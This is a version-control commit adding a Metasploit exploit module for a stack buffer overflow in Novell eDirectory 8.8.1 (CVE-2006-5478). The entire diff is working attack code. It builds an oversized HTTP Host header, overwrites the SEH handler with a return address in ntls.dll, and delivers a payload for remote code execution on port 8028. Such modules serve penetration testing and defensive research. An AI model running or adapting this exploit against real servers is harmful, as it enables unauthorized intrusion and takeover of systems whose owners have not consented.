added exploit module edirectory_host.rb

git-svn-id: file:///home/svn/framework3/trunk@4060 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/http/edirectory_host.rb

@@ -0,0 +1,71 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Http::Edirectory_Host < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+	include Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Novell eDirectory NDS Server Host Header Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in Novell eDirectory 8.8.1.
+				The web interface does not validate the length of the 
+				HTTP Host header prior to using the value of that header in an 
+				HTTP redirect.
+			},
+			'Author'         => 'MC',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     => 
+				[ 
+					['CVE', '2006-5478'],
+					['BID', '20655'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 600,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll 
+				],
+
+			'Privileged'     => true,
+
+			'DisclosureDate' => 'Oct 21 2006',
+
+			'DefaultTarget' => 0))
+
+			register_options([Opt::RPORT(8028)], self.class)
+	end
+
+	def exploit
+		connect
+
+		sploit =  "GET /nds HTTP/1.1" + "\r\n" 
+		sploit << "Host: " + Rex::Text.rand_text_alphanumeric(9, payload_badchars) 
+		sploit << "," + Rex::Text.rand_text_alphanumeric(719, payload_badchars) 
+		seh    = generate_seh_payload(target.ret)
+		sploit[705, seh.length] = seh
+		sploit << "\r\n\r\n"
+
+		print_status("Trying target #{target.name}...")
+
+		sock.put(sploit)
+		
+		handler
+		disconnect
+	end
+
+end
+end